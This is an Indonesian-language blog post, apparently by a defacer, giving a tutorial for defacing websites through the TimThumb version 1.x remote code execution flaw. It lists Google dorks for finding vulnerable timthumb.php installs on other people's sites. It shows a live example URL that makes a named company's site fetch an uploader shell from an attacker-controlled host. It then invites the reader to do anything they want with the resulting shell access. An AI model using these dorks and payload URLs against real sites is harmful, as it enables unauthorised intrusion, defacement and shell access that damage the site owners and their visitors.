Deface Timthumb RCE
Assalamu'Alaikum Wr Wb
Ketemu Lagi dengan w :'v Kali ini w bakal Kasih tutor Deface Timthumb RCE,
Ya.. Poc ini emang banyak banget Vuln nya asal mau ngembangin dork pasti dapet vuln :'v
Tanpa Basa - Basi Langsung Aja :
DORK:
inurl:/admin/timthumb.php?src=http
inurl:/utils/timthumb.php?src=http
inurl:/images/timthumb.php?src=http
inurl:/gallery/timthumb.php?src=http
inurl:/uploads/timthumb.php?src=http
inurl:/files/timthumb.php?src=http
Kembangin Lagi Biar JOSS...
Source Code Uploader
Disini Mhanxx
POC:
1. Dorking Dulu Pake dork yg diatas
 |
| Dorking Di google Image Ya Bre |
2. Klik "Lihat Gambar" buat melihat timthumbnya.
Nah kalo Kaya Gini Setau W Vuln:'v
 |
| Vuln nya yg v 1.x |
3. Kalo dapet yg kaya gitu langsung masukin url source code uploader nya dibelakang timthumb.php?src=
Contoh:
http://www.rubber-tyre.com.vn/utils/timthumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php
4. Nah Kalo emang vuln nanti di kasih akses shell nya :'v kyk gini
 |
| Kalo Error brati gk bisa :'v |
 |
| biasanya kalo pake source code shell langsung , kadang error |
Kalo udh Terserah Deh mau di apain :p
W nitip Nick ./SpecimenT :'v
Sekian Dulu Tutorial Kali ini
Wassalamu'alaikum wr wb
No comments :
Post a Comment